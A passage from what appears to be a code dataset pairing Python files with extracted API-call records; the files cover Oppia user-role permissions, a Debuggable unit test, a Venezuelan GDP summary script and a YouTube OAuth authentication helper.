820), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((872, 882), 'sqlalchemy.String', 'String', (['(50)'], {}), '(50)\n', (878, 882), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((940, 950), 'sqlalchemy.DateTime', 'DateTime', ([], {}), '()\n', (948, 950), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1014, 1024), 'sqlalchemy.DateTime', 'DateTime', ([], {}), '()\n', (1022, 1024), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1152, 1161), 'sqlalchemy.Integer', 'Integer', ([], {}), '()\n', (1159, 1161), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1211, 1222), 'sqlalchemy.String', 'String', (['(200)'], {}), '(200)\n', (1217, 1222), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1276, 1290), 'sqlalchemy.Numeric', 'Numeric', (['(10)', '(2)'], {}), '(10, 2)\n', (1283, 1290), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1347, 1361), 'sqlalchemy.Numeric', 'Numeric', (['(10)', '(2)'], {}), '(10, 2)\n', (1354, 1361), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1413, 1422), 'sqlalchemy.Integer', 'Integer', ([], {}), '()\n', (1420, 1422), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1590, 1599), 'sqlalchemy.Integer', 'Integer', ([], {}), '()\n', (1597, 1599), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1657, 1683), 'sqlalchemy.ForeignKey', 'ForeignKey', (['"""customers.id"""'], {}), "('customers.id')\n", (1667, 1683), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1723, 1733), 'sqlalchemy.DateTime', 'DateTime', ([], {}), '()\n', (1731, 1733), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1796, 1806), 'sqlalchemy.DateTime', 'DateTime', ([], {}), '()\n', (1804, 1806), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1904, 1913), 'sqlalchemy.Integer', 'Integer', ([], {}), '()\n', (1911, 1913), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((1973, 1996), 'sqlalchemy.ForeignKey', 'ForeignKey', (['"""orders.id"""'], {}), "('orders.id')\n", (1983, 1996), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((2037, 2059), 'sqlalchemy.ForeignKey', 'ForeignKey', (['"""items.id"""'], {}), "('items.id')\n", (2047, 2059), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((2101, 2110), 'sqlalchemy.Integer', 'Integer', ([], {}), '()\n', (2108, 2110), False, 'from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, Numeric, CheckConstraint, cast, Date, distinct, union\n'), ((4880, 4895), 'sqlalchemy.select', 'select', (['[items]'], {}), '([items])\n', (4886, 4895), False, 'from sqlalchemy import select\n'), ((5184, 5200), 'sqlalchemy.select', 'select', (['[orders]'], {}), '([orders])\n', (5190, 5200), False, 'from sqlalchemy import select\n'), ((5581, 5590), 'sqlalchemy.select', 'select', (['c'], {}), '(c)\n', (5587, 5590), False, 'from sqlalchemy import select\n'), ((5013, 5028), 'sqlalchemy.select', 'select', (['[items]'], {}), '([items])\n', (5019, 5028), False, 'from sqlalchemy import select\n'), ((5521, 5536), 'sqlalchemy.sql.func.count', 'func.count', (['"""*"""'], {}), "('*')\n", (5531, 5536), False, 'from sqlalchemy.sql import func\n'), ((5339, 5354), 'sqlalchemy.select', 'select', (['[items]'], {}), '([items])\n', (5345, 5354), False, 'from sqlalchemy import select\n')]
|
# coding: utf-8
#
# Copyright 2017 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module contains the structure of roles and actions,
actions permitted to the roles and the functions needed to access roles
and actions.
"""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import copy
import math
import random
import time
from core.platform import models
import feconf
(audit_models,) = models.Registry.import_models([models.NAMES.audit])
# Actions that can be performed in the system.
ACTION_ACCEPT_ANY_SUGGESTION = 'ACCEPT_ANY_SUGGESTION'
ACTION_ACCEPT_ANY_VOICEOVER_APPLICATION = (
'ACTION_ACCEPT_ANY_VOICEOVER_APPLICATION')
ACTION_ACCESS_CREATOR_DASHBOARD = 'ACCESS_CREATOR_DASHBOARD'
ACTION_ACCESS_LEARNER_DASHBOARD = 'ACCESS_LEARNER_DASHBOARD'
ACTION_ACCESS_MODERATOR_PAGE = 'ACCESS_MODERATOR_PAGE'
ACTION_ACCESS_RELEASE_COORDINATOR_PAGE = 'ACCESS_RELEASE_COORDINATOR_PAGE'
ACTION_ACCESS_TOPICS_AND_SKILLS_DASHBOARD = 'ACCESS_TOPICS_AND_SKILLS_DASHBOARD'
ACTION_CHANGE_TOPIC_STATUS = 'CHANGE_TOPIC_STATUS'
ACTION_CHANGE_STORY_STATUS = 'CHANGE_STORY_STATUS'
ACTION_CREATE_COLLECTION = 'CREATE_COLLECTION'
ACTION_CREATE_EXPLORATION = 'CREATE_EXPLORATION'
ACTION_CREATE_NEW_SKILL = 'CREATE_NEW_SKILL'
ACTION_CREATE_NEW_TOPIC = 'CREATE_NEW_TOPIC'
ACTION_MANAGE_QUESTION_SKILL_STATUS = 'MANAGE_QUESTION_SKILL_STATUS'
ACTION_DELETE_ANY_ACTIVITY = 'DELETE_ANY_ACTIVITY'
ACTION_DELETE_ANY_PUBLIC_ACTIVITY = 'DELETE_ANY_PUBLIC_ACTIVITY'
ACTION_DELETE_ANY_QUESTION = 'DELETE_ANY_QUESTION'
ACTION_DELETE_ANY_SKILL = 'DELETE_ANY_SKILL'
ACTION_DELETE_OWNED_PRIVATE_ACTIVITY = 'DELETE_OWNED_PRIVATE_ACTIVITY'
ACTION_DELETE_TOPIC = 'DELETE_TOPIC'
ACTION_EDIT_ANY_ACTIVITY = 'EDIT_ANY_ACTIVITY'
ACTION_EDIT_ANY_PUBLIC_ACTIVITY = 'EDIT_ANY_PUBLIC_ACTIVITY'
ACTION_EDIT_ANY_QUESTION = 'EDIT_ANY_QUESTION'
ACTION_EDIT_ANY_SKILL = 'EDIT_ANY_SKILL'
ACTION_EDIT_ANY_SUBTOPIC_PAGE = 'EDIT_ANY_SUBTOPIC_PAGE'
ACTION_EDIT_ANY_TOPIC = 'EDIT_ANY_TOPIC'
ACTION_EDIT_ANY_BLOG_POST = 'EDIT_ANY_BLOG_POST'
ACTION_RUN_ANY_JOB = 'RUN_ANY_JOB'
ACTION_EDIT_ANY_STORY = 'EDIT_ANY_STORY'
ACTION_EDIT_OWNED_ACTIVITY = 'EDIT_OWNED_ACTIVITY'
ACTION_EDIT_OWNED_TOPIC = 'EDIT_OWNED_TOPIC'
ACTION_EDIT_OWNED_STORY = 'EDIT_OWNED_STORY'
ACTION_EDIT_SKILL_DESCRIPTION = 'EDIT_SKILL_DESCRIPTION'
ACTION_EDIT_SKILLS = 'EDIT_SKILLS'
ACTION_FLAG_EXPLORATION = 'FLAG_EXPLORATION'
ACTION_MANAGE_ACCOUNT = 'MANAGE_ACCOUNT'
ACTION_MANAGE_EMAIL_DASHBOARD = 'MANAGE_EMAIL_DASHBOARD'
ACTION_MANAGE_MEMCACHE = 'MANAGE_MEMCACHE'
ACTION_MANAGE_QUESTION_RIGHTS = 'MANAGE_QUESTION_RIGHTS'
ACTION_MANAGE_TOPIC_RIGHTS = 'MANAGE_TOPIC_RIGHTS'
ACTION_MODIFY_ROLES_FOR_ANY_ACTIVITY = 'MODIFY_ROLES_FOR_ANY_ACTIVITY'
ACTION_MODIFY_ROLES_FOR_OWNED_ACTIVITY = 'MODIFY_ROLES_FOR_OWNED_ACTIVITY'
ACTION_PLAY_ANY_PRIVATE_ACTIVITY = 'PLAY_ANY_PRIVATE_ACTIVITY'
ACTION_PLAY_ANY_PUBLIC_ACTIVITY = 'PLAY_ANY_PUBLIC_ACTIVITY'
ACTION_PUBLISH_ANY_ACTIVITY = 'PUBLISH_ANY_ACTIVITY'
ACTION_PUBLISH_OWNED_ACTIVITY = 'PUBLISH_OWNED_ACTIVITY'
ACTION_PUBLISH_OWNED_SKILL = 'PUBLISH_OWNED_SKILL'
ACTION_RATE_ANY_PUBLIC_EXPLORATION = 'RATE_ANY_PUBLIC_EXPLORATION'
ACTION_SEND_MODERATOR_EMAILS = 'SEND_MODERATOR_EMAILS'
ACTION_SUBMIT_VOICEOVER_APPLICATION = 'ACTION_SUBMIT_VOICEOVER_APPLICATION'
ACTION_SUBSCRIBE_TO_USERS = 'SUBSCRIBE_TO_USERS'
ACTION_SUGGEST_CHANGES = 'SUGGEST_CHANGES'
ACTION_UNPUBLISH_ANY_PUBLIC_ACTIVITY = 'UNPUBLISH_ANY_PUBLIC_ACTIVITY'
ACTION_VISIT_ANY_QUESTION_EDITOR = 'VISIT_ANY_QUESTION_EDITOR'
ACTION_VISIT_ANY_TOPIC_EDITOR = 'VISIT_ANY_TOPIC_EDITOR'
# Users can be updated to the following list of role IDs via admin interface.
#
# NOTE: LEARNER role should not be updated to any other role, hence do not
# add it to the following list.
UPDATABLE_ROLES = [
feconf.ROLE_ID_ADMIN,
feconf.ROLE_ID_BANNED_USER,
feconf.ROLE_ID_COLLECTION_EDITOR,
feconf.ROLE_ID_EXPLORATION_EDITOR,
feconf.ROLE_ID_MODERATOR,
feconf.ROLE_ID_RELEASE_COORDINATOR,
feconf.ROLE_ID_TOPIC_MANAGER
]
# Users can be viewed by following list of role IDs via admin interface.
#
# NOTE: Do not include LEARNER role in this list as it does not represent
# role for a separate user account, but rather a profile within the account.
VIEWABLE_ROLES = [
feconf.ROLE_ID_ADMIN,
feconf.ROLE_ID_BANNED_USER,
feconf.ROLE_ID_COLLECTION_EDITOR,
feconf.ROLE_ID_MODERATOR,
feconf.ROLE_ID_RELEASE_COORDINATOR,
feconf.ROLE_ID_TOPIC_MANAGER
]
# The string corresponding to role IDs that should be visible to admin.
HUMAN_READABLE_ROLES = {
feconf.ROLE_ID_ADMIN: 'admin',
feconf.ROLE_ID_BANNED_USER: 'banned user',
feconf.ROLE_ID_COLLECTION_EDITOR: 'collection editor',
feconf.ROLE_ID_EXPLORATION_EDITOR: 'exploration editor',
feconf.ROLE_ID_GUEST: 'guest',
feconf.ROLE_ID_LEARNER: 'learner',
feconf.ROLE_ID_MODERATOR: 'moderator',
feconf.ROLE_ID_RELEASE_COORDINATOR: 'release coordinator',
feconf.ROLE_ID_TOPIC_MANAGER: 'topic manager'
}
# TODO(#12755): Remove this function once user roles are independent and
# doesn't need the _get_unique_actions_list to generate the unique actions.
# It is not expected to define a function before defining constants in the
# module. The _get_unique_actions_list function is needed here
# as it helps generating values for constants.
def _get_unique_actions_list(*actions):
"""Returns a list of unique actions out of the given list of actions.
Args:
*actions: list(str). List of actions whcihcan contain duplicate items.
Returns:
list(str). A list of unique action strings.
"""
return list(set(actions))
_GUEST_ALLOWED_ACTIONS = _get_unique_actions_list(
ACTION_PLAY_ANY_PUBLIC_ACTIVITY)
_LEARNER_ALLOWED_ACTIONS = _get_unique_actions_list(
ACTION_FLAG_EXPLORATION,
ACTION_ACCESS_LEARNER_DASHBOARD,
*_GUEST_ALLOWED_ACTIONS)
_EXPLORATION_EDITOR_ALLOWED_ACTIONS = _get_unique_actions_list(
ACTION_ACCESS_CREATOR_DASHBOARD,
ACTION_CREATE_EXPLORATION,
ACTION_DELETE_OWNED_PRIVATE_ACTIVITY,
ACTION_EDIT_OWNED_ACTIVITY,
ACTION_SUBSCRIBE_TO_USERS,
ACTION_MANAGE_ACCOUNT,
ACTION_MODIFY_ROLES_FOR_OWNED_ACTIVITY,
ACTION_PUBLISH_OWNED_ACTIVITY,
ACTION_RATE_ANY_PUBLIC_EXPLORATION,
ACTION_SUGGEST_CHANGES,
ACTION_SUBMIT_VOICEOVER_APPLICATION,
*_LEARNER_ALLOWED_ACTIONS)
_COLLECTION_EDITOR_ALLOWED_ACTIONS = _get_unique_actions_list(
ACTION_CREATE_COLLECTION,
*_EXPLORATION_EDITOR_ALLOWED_ACTIONS)
_TOPIC_MANAGER_ALLOWED_ACTIONS = _get_unique_actions_list(
ACTION_ACCESS_TOPICS_AND_SKILLS_DASHBOARD,
ACTION_DELETE_ANY_QUESTION,
ACTION_EDIT_ANY_QUESTION,
ACTION_EDIT_OWNED_STORY,
ACTION_EDIT_OWNED_TOPIC,
ACTION_EDIT_SKILLS,
ACTION_EDIT_ANY_SUBTOPIC_PAGE,
ACTION_MANAGE_QUESTION_SKILL_STATUS,
ACTION_VISIT_ANY_QUESTION_EDITOR,
ACTION_VISIT_ANY_TOPIC_EDITOR,
*_COLLECTION_EDITOR_ALLOWED_ACTIONS)
_MODERATOR_ALLOWED_ACTIONS = _get_unique_actions_list(
ACTION_ACCESS_MODERATOR_PAGE,
ACTION_DELETE_ANY_PUBLIC_ACTIVITY,
ACTION_EDIT_ANY_PUBLIC_ACTIVITY,
ACTION_PLAY_ANY_PRIVATE_ACTIVITY,
ACTION_SEND_MODERATOR_EMAILS,
ACTION_UNPUBLISH_ANY_PUBLIC_ACTIVITY,
*_TOPIC_MANAGER_ALLOWED_ACTIONS)
_RELEASE_COORDINATOR_ALLOWED_ACTIONS = _get_unique_actions_list(
ACTION_ACCESS_RELEASE_COORDINATOR_PAGE,
ACTION_MANAGE_MEMCACHE,
ACTION_RUN_ANY_JOB,
*_EXPLORATION_EDITOR_ALLOWED_ACTIONS)
_ADMIN_ALLOWED_ACTIONS = _get_unique_actions_list(
ACTION_ACCEPT_ANY_SUGGESTION,
ACTION_ACCEPT_ANY_VOICEOVER_APPLICATION,
ACTION_CHANGE_STORY_STATUS,
ACTION_CHANGE_TOPIC_STATUS,
ACTION_CREATE_NEW_SKILL,
ACTION_CREATE_NEW_TOPIC,
ACTION_DELETE_ANY_ACTIVITY,
ACTION_DELETE_ANY_SKILL,
ACTION_DELETE_TOPIC,
ACTION_EDIT_ANY_ACTIVITY,
ACTION_EDIT_ANY_STORY,
ACTION_EDIT_ANY_TOPIC,
ACTION_EDIT_SKILLS,
ACTION_EDIT_SKILL_DESCRIPTION,
ACTION_MANAGE_EMAIL_DASHBOARD,
ACTION_MANAGE_TOPIC_RIGHTS,
ACTION_MODIFY_ROLES_FOR_ANY_ACTIVITY,
ACTION_PUBLISH_ANY_ACTIVITY,
ACTION_PUBLISH_OWNED_SKILL,
*_MODERATOR_ALLOWED_ACTIONS)
# This dict represents all the actions that belong to a particular role.
_ROLE_ACTIONS = {
feconf.ROLE_ID_ADMIN: _ADMIN_ALLOWED_ACTIONS,
feconf.ROLE_ID_BANNED_USER: [],
feconf.ROLE_ID_COLLECTION_EDITOR: _COLLECTION_EDITOR_ALLOWED_ACTIONS,
feconf.ROLE_ID_EXPLORATION_EDITOR: _EXPLORATION_EDITOR_ALLOWED_ACTIONS,
feconf.ROLE_ID_GUEST: _GUEST_ALLOWED_ACTIONS,
feconf.ROLE_ID_LEARNER: _LEARNER_ALLOWED_ACTIONS,
feconf.ROLE_ID_MODERATOR: _MODERATOR_ALLOWED_ACTIONS,
feconf.ROLE_ID_RELEASE_COORDINATOR: _RELEASE_COORDINATOR_ALLOWED_ACTIONS,
feconf.ROLE_ID_TOPIC_MANAGER: _TOPIC_MANAGER_ALLOWED_ACTIONS
}
def get_all_actions(role):
"""Returns a list of all actions that can be performed by the given role.
Args:
role: str. A string defining the user role.
Returns:
list(str). A list of actions accessible to the role.
Raises:
Exception. The given role does not exist.
"""
if role not in _ROLE_ACTIONS:
raise Exception('Role %s does not exist.' % role)
role_actions = _ROLE_ACTIONS[role]
return role_actions
def get_role_actions():
"""Returns the possible role to actions items in the application.
Returns:
dict(str, list(str)). A dict presenting key as role and values as list
of actions corresponding to the given role.
"""
return copy.deepcopy(_ROLE_ACTIONS)
def is_valid_role(role):
"""Validates whether the given role is valid.
Args:
role: str. The role to validate.
Returns:
bool. Whether the given role is valid or not.
"""
return role in _ROLE_ACTIONS
def log_role_query(user_id, intent, role=None, username=None):
"""Stores the query to role structure in RoleQueryAuditModel."""
model_id = '%s.%s.%s.%s' % (
user_id, int(math.floor(time.time())), intent, random.randint(0, 1000)
)
model = audit_models.RoleQueryAuditModel(
id=model_id, user_id=user_id, intent=intent,
role=role, username=username)
model.update_timestamps()
model.put()
|
[
"copy.deepcopy",
"core.platform.models.Registry.import_models",
"random.randint",
"time.time"
] |
[((1048, 1099), 'core.platform.models.Registry.import_models', 'models.Registry.import_models', (['[models.NAMES.audit]'], {}), '([models.NAMES.audit])\n', (1077, 1099), False, 'from core.platform import models\n'), ((10115, 10143), 'copy.deepcopy', 'copy.deepcopy', (['_ROLE_ACTIONS'], {}), '(_ROLE_ACTIONS)\n', (10128, 10143), False, 'import copy\n'), ((10604, 10627), 'random.randint', 'random.randint', (['(0)', '(1000)'], {}), '(0, 1000)\n', (10618, 10627), False, 'import random\n'), ((10581, 10592), 'time.time', 'time.time', ([], {}), '()\n', (10590, 10592), False, 'import time\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8; mode: python; py-indent-offset: 4; py-continuation-offset: 4 -*-
#===============================================================================
# Copyright Notice
# ----------------
# Copyright 2021 National Technology & Engineering Solutions of Sandia,
# LLC (NTESS). Under the terms of Contract DE-NA0003525 with NTESS,
# the U.S. Government retains certain rights in this software.
#
# License (3-Clause BSD)
# ----------------------
# Copyright 2021 National Technology & Engineering Solutions of Sandia,
# LLC (NTESS). Under the terms of Contract DE-NA0003525 with NTESS,
# the U.S. Government retains certain rights in this software.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#===============================================================================
"""
"""
from __future__ import print_function
import sys
sys.dont_write_bytecode = True
import os
sys.path.insert(1, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import unittest
from unittest import TestCase
# Coverage will always miss one of these depending on the system
# and what is available.
try: # pragma: no cover
import unittest.mock as mock # pragma: no cover
except: # pragma: no cover
import mock # pragma: no cover
from mock import Mock
from mock import MagicMock
from mock import patch
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
from configparserenhanced import Debuggable
from .common import *
#===============================================================================
#
# General Utility Functions
#
#===============================================================================
#===============================================================================
#
# Mock Helpers
#
#===============================================================================
#===============================================================================
#
# Tests
#
#===============================================================================
class DebuggableTest(TestCase):
"""
Main test driver for the SetEnvironment class
"""
def setUp(self):
print("")
return
def test_Debuggable_property_debug_level(self):
"""
Test reading and setting the property `debug_level`
"""
class testme(Debuggable):
def __init__(self):
return
inst_testme = testme()
self.assertEqual(0, inst_testme.debug_level)
inst_testme.debug_level = 1
self.assertEqual(1, inst_testme.debug_level)
inst_testme.debug_level = 5
self.assertEqual(5, inst_testme.debug_level)
inst_testme.debug_level = 100
self.assertEqual(100, inst_testme.debug_level)
inst_testme.debug_level = 0
self.assertEqual(0, inst_testme.debug_level)
inst_testme.debug_level = -1
self.assertEqual(0, inst_testme.debug_level)
print("OK")
return 0
def test_Debuggable_method_debug_message(self):
class testme(Debuggable):
def __init__(self):
pass
return
inst_testme = testme()
message = "This is a test message!"
with patch('sys.stdout', new=StringIO()) as fake_out:
inst_testme.debug_message(0, message, end="\n")
self.assertEqual(fake_out.getvalue(), message + "\n")
with patch('sys.stdout', new=StringIO()) as fake_out:
inst_testme.debug_message(1, message, end="\n")
self.assertEqual(fake_out.getvalue(), "")
inst_testme.debug_level = 3
with patch('sys.stdout', new=StringIO()) as fake_out:
inst_testme.debug_message(3, message, end="\n")
self.assertEqual(fake_out.getvalue(), "[D-3] " + message + "\n")
inst_testme.debug_level = 2
with patch('sys.stdout', new=StringIO()) as fake_out:
inst_testme.debug_message(0, "A", end="", useprefix=False)
inst_testme.debug_message(1, "B", end="", useprefix=False)
inst_testme.debug_message(2, "C", end="", useprefix=False)
inst_testme.debug_message(3, "D", end="", useprefix=False)
inst_testme.debug_message(4, "E", end="", useprefix=False)
self.assertEqual(fake_out.getvalue(), "ABC")
print("OK")
return 0
# EOF
|
[
"os.path.abspath",
"io.StringIO"
] |
[((2417, 2442), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (2432, 2442), False, 'import os\n'), ((4817, 4827), 'io.StringIO', 'StringIO', ([], {}), '()\n', (4825, 4827), False, 'from io import StringIO\n'), ((5006, 5016), 'io.StringIO', 'StringIO', ([], {}), '()\n', (5014, 5016), False, 'from io import StringIO\n'), ((5219, 5229), 'io.StringIO', 'StringIO', ([], {}), '()\n', (5227, 5229), False, 'from io import StringIO\n'), ((5455, 5465), 'io.StringIO', 'StringIO', ([], {}), '()\n', (5463, 5465), False, 'from io import StringIO\n')]
|
import csv
import numpy as np
import pandas as pd
datapath = './data/Per capita GDP at current prices - US Dollars.csv'
df = pd.read_csv(datapath, header=0)
df = df.sort_values('Year', ascending=True)
df = df[df['Country or Area']=='Venezuela (Bolivarian Republic of)']
df = df[['Year', 'Value']]
# Prints summary stats for Venezuelan GDP 1970-2017 (Table1)
print('-------------Venezuelan Per Capita GDP % Change, 1970-2017 (Current US Dollars)----------------')
print(df['Value'].pct_change(axis='rows').describe())
print('')
# Prints summary stats for Venezuelan GDP 1999 - 2013 (Table 1)
df2 = df[df['Year'] >= 1999]
df2 = df2[df2['Year'] <= 2013]
print('-------------Venezuelan Per Capita GDP % Change, 1999-2013 (Current US Dollars)----------------')
print(df2['Value'].pct_change(axis='rows').describe())
print('')
# Prints summary stats for Venezuelan GDP 2013 - 2017 (Table 1)
print('-------------Venezuelan Per Capita GDP % Change, 2013-2017 (Current US Dollars)----------------')
df3 = df[df['Year'] >= 2013]
print(df3['Value'].pct_change(axis='rows').describe())
print('')
# Prints summary stats for world GDP growth in 2017 (Table 2)
df = pd.read_csv(datapath, header=0)
df = df[df['Year'] >= 2016]
df = df.dropna()
df = df[df.duplicated(subset=['Country or Area'], keep=False)]
obj = {'Country': [], '2016' : [], '2017' : []}
for index, row in df.iterrows():
if row['Country or Area'] not in obj['Country']:
obj['Country'].append(row['Country or Area'])
if row['Year'] == 2016:
obj['2016'].append(row['Value'])
if row['Year'] == 2017:
obj['2017'].append(row['Value'])
df = pd.DataFrame(data={'2016': obj['2016'], '2017': obj['2017']}, index=obj['Country'])
df = df.rename(columns={'2017': 'Value'})
print('------------- International Per Capita GDP % Change, 1970-2017 (Current US Dollars)----------------')
print(df.pct_change(axis='columns')['Value'].describe())
|
[
"pandas.read_csv",
"pandas.DataFrame"
] |
[((126, 157), 'pandas.read_csv', 'pd.read_csv', (['datapath'], {'header': '(0)'}), '(datapath, header=0)\n', (137, 157), True, 'import pandas as pd\n'), ((1154, 1185), 'pandas.read_csv', 'pd.read_csv', (['datapath'], {'header': '(0)'}), '(datapath, header=0)\n', (1165, 1185), True, 'import pandas as pd\n'), ((1619, 1707), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': "{'2016': obj['2016'], '2017': obj['2017']}", 'index': "obj['Country']"}), "(data={'2016': obj['2016'], '2017': obj['2017']}, index=obj[\n 'Country'])\n", (1631, 1707), True, 'import pandas as pd\n')]
|
import os
import pickle
from shutil import copyfile
from pathlib import Path
from google_auth_oauthlib.flow import InstalledAppFlow
from googleapiclient.discovery import build
import googleapiclient.errors
from config import FOLDER_CHANNELS
class Authentication:
def __init__(self,
first_time: bool = None,
new_client_secrets: bool = None,
channel_id_secrets: str = None,
channel_id: str = None):
# Conditions on the inputs: there are three cases
self.case_first_time_reuse_secrets = first_time and not new_client_secrets and bool(
channel_id_secrets)
self.case_first_time_new_secrets = first_time and new_client_secrets
self.case_already_stored = not first_time and bool(channel_id)
assert self.case_first_time_reuse_secrets or self.case_first_time_new_secrets or self.case_already_stored, "You are not initializing the inputs correctly"
self.scopes = ["https://www.googleapis.com/auth/youtube.readonly"]
self.api_service_name = 'youtube'
self.api_version = 'v3'
self.first_time = first_time
self.new_client_secrets = new_client_secrets
self.channel_id_secrets = channel_id_secrets
self.channel_id = channel_id
self.client_secrets_file = self._define_client_secrets_file()
if self.first_time:
self._get_authenticated_first_time()
self._move_client_secrets_file()
else:
self._get_authenticated_from_file()
def _define_client_secrets_file(self):
if self.case_first_time_reuse_secrets:
return f'{FOLDER_CHANNELS}/{self.channel_id_secrets}/client_secrets.json'
elif self.case_first_time_new_secrets:
return f'{FOLDER_CHANNELS}/new_channel/client_secrets.json'
elif self.case_already_stored:
return f'{FOLDER_CHANNELS}/{self.channel_id}/client_secrets.json'
def _get_authenticated_first_time(self):
# Ask for authorization
flow = InstalledAppFlow.from_client_secrets_file(self.client_secrets_file,
self.scopes)
# Get the credentials
self.credentials = flow.run_local_server(port=8080, open_browser=True)
# Make the Youtube object
self._make_youtube_object()
# Save the credentials in a file
# Get the channel id
request = self.youtube.channels().list(
part='snippet',
mine='True'
)
response = request.execute()
self.channel_id = response['items'][0]['id']
# Create a new folder for the channel
Path(f'{FOLDER_CHANNELS}/{self.channel_id}').mkdir(parents=True, exist_ok=True)
# Save the OAuth credentials in a file called OAUTH_CREDENTIALS
self.oauth_credentials_file = f'{FOLDER_CHANNELS}/{self.channel_id}/OAUTH_CREDENTIALS'
with open(self.oauth_credentials_file, 'wb') as f:
pickle.dump(self.credentials, f)
def _move_client_secrets_file(self):
new_destination = f'{FOLDER_CHANNELS}/{self.channel_id}/client_secrets.json'
# In this case we move the file
if self.case_first_time_new_secrets:
os.rename(self.client_secrets_file, new_destination)
# In this case we copy the file
elif self.case_first_time_reuse_secrets:
copyfile(self.client_secrets_file, new_destination)
# Redefine the new location
self.client_secrets_file = new_destination
def _get_authenticated_from_file(self):
self.oauth_credentials_file = f'{FOLDER_CHANNELS}/{self.channel_id}/OAUTH_CREDENTIALS'
with open(self.oauth_credentials_file, 'rb') as f:
self.credentials = pickle.load(f)
self._make_youtube_object()
def _make_youtube_object(self):
self.youtube = build(self.api_service_name,
self.api_version,
credentials=self.credentials)
|
[
"pickle.dump",
"os.rename",
"pathlib.Path",
"pickle.load",
"shutil.copyfile",
"google_auth_oauthlib.flow.InstalledAppFlow.from_client_secrets_file",
"googleapiclient.discovery.build"
] |
